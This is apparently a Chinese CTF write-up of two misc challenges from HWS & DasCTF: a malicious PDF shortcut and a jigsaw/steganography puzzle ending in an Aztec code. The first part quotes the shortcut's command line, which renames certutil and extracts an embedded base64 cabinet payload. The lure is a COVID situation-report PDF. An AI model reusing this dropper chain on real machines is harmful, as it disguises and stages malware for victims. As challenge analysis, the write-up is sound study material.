babypdf 附件是一个快捷方式,但是打开是可以成功的看到pdf的,这就肯定是从外面加载进来的
看一下目标
%SystemRoot%\system32\cmd.exe /c copy "20200308-sitrep-48-covid-19.pdf.lnk" %tmp%\\g4ZokyumBB2gDn.tmp /y&for /r C:\\Windows\\System32\\ %i in (*ertu*.exe) do copy %i %tmp%\\msoia.exe /y&findstr.exe "TVNDRgAAAA" %tmp%\\g4ZokyumBB2gDn.tmp>%tmp%\\cSi1r0uywDNvDu.
在tmp目录下找到g4ZokyumBB2gDn.tmp
有两段base64
![比赛wp|[HWS&DasCTF]misc](https://img.it610.com/image/info8/6d54832aad2542d7be3cea7c3a59072d.jpg)
文章图片
上下两段解出来都是MSCF文件头,是后缀为cab的归档文件
![比赛wp|[HWS&DasCTF]misc](https://img.it610.com/image/info8/e3cb06c15560480e8c5f4c56ee9017cf.jpg)
文章图片
第一个打不开,第二个打开出现了他加载的pdf
![比赛wp|[HWS&DasCTF]misc](https://img.it610.com/image/info8/cd99a632f87348419771c0ca7f7d7520.png)
文章图片
然后再tmp文件里面找到了这个
![比赛wp|[HWS&DasCTF]misc](https://img.it610.com/image/info8/b295c55a7c7c4eebaa4e9927ea3649e3.jpg)
文章图片
hex解密后,xor1得到了flag
![比赛wp|[HWS&DasCTF]misc](https://img.it610.com/image/info8/0d76ac3b3bed41a8af08863e6483a60c.jpg)
文章图片
gogogo 【比赛wp|[HWS&DasCTF]misc】拿到手,有一堆拼图
![比赛wp|[HWS&DasCTF]misc](https://img.it610.com/image/info8/8db8935b3ae34bf7b2be6530fb73d934.jpg)
文章图片
一共是256张拼图,是16*16的
magick montage *.png -tile x16 -geometry +0+0 flag.png
![比赛wp|[HWS&DasCTF]misc](https://img.it610.com/image/info8/d3ce17463780467fb90dce62e927b957.jpg)
文章图片
再用gaps跑拼图
![比赛wp|[HWS&DasCTF]misc](https://img.it610.com/image/info8/417495177aa24d53b34fb76596200b6d.jpg)
文章图片
得到密码:3e8f092d4d7b80ce338d6e238efb01,还不知道干啥的,先放着
然后分析镜像文件,找到了一个压缩包,dump出来
![比赛wp|[HWS&DasCTF]misc](https://img.it610.com/image/info8/a9cad055a15f4e67b205b3b449dab56e.jpg)
文章图片
发现是有密码的,用上面拼图得到的密码解开,是一个png
但是有两个文件头,删去一个即可
先拿去Stegsolve分析一下,貌似LSB有点东西,zsteg分离出一个png
![比赛wp|[HWS&DasCTF]misc](https://img.it610.com/image/info8/8718b6f76420483ba73161cc41f2a67a.jpg)
文章图片
![比赛wp|[HWS&DasCTF]misc](https://img.it610.com/image/info8/e1769ff551d44f5d97bd92d4ba091d3d.jpg)
文章图片
xor,比较都没发现啥东西,估计是迷惑人的
然后就分析这个码,一开始以为是二维码,想着怎么修复,但是发现不太现实
![比赛wp|[HWS&DasCTF]misc](https://img.it610.com/image/info8/e3a336e9137345c986aaaf4b557fb5fb.png)
文章图片
后来换了个思路,可能不是二维码,找到了一个azteccode,刚好中间是固定的
![比赛wp|[HWS&DasCTF]misc](https://img.it610.com/image/info8/a99adf8ab830423f987916685ade772f.png)
文章图片
扫码得到flag:flag{fbab8380-a642-48aa-89b1-8e251f826b12}
推荐阅读
- 比赛wp|[VNCTF2022]部分wp
- 代码审计|[代码审计]ThinkPHP 5.0.x 变量覆盖导致的RCE分析
- 代码审计|[代码审计]yii2 反序列化漏洞分析
- Delphi|如何准备迎接新版本Embarcadero RAD Studio Delphi、C++Builder 11
- Delphi|RAD Studio Delphi C++ Builder 2020年11月开发路线图PPT(研发Delphi WebAssembly编译器)
- 开发语言|C++ Builder与Visual C++孰优孰劣
- 数据结构|离散化算法
- 网络|2022 年顶级网络安全专家最爱用的10大工具
- android|android studio python3开发环境_Android Studio 学习笔记 - 开发环境的架设